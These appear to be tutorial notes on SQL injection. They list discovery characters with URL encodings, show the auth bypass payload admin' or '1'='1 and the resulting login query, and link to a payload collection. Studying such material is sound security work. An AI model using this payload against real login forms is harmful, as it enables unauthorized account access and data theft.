# Subverting query logic 

## SQLi Discovery 

Payload | URL Encoded 
--------|-------------
' | %27
" | %22
\# | %23
; | %3B
) | %29

> Sometimes we may have to use the URL Encoded version of the payload. An Example of this is when we put our payload directly in the URL 

```
admin' or '1'='1
SELECT * FROM logins WHERE username='admin' or '1'='1' AND password = 'something';
```
![sqli](./img/SQLi1.png)

> The payload we used above is one of many auth bypass payloads we can use to subvert the authentication logic. 

[Payloads](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection#authentication-bypass)
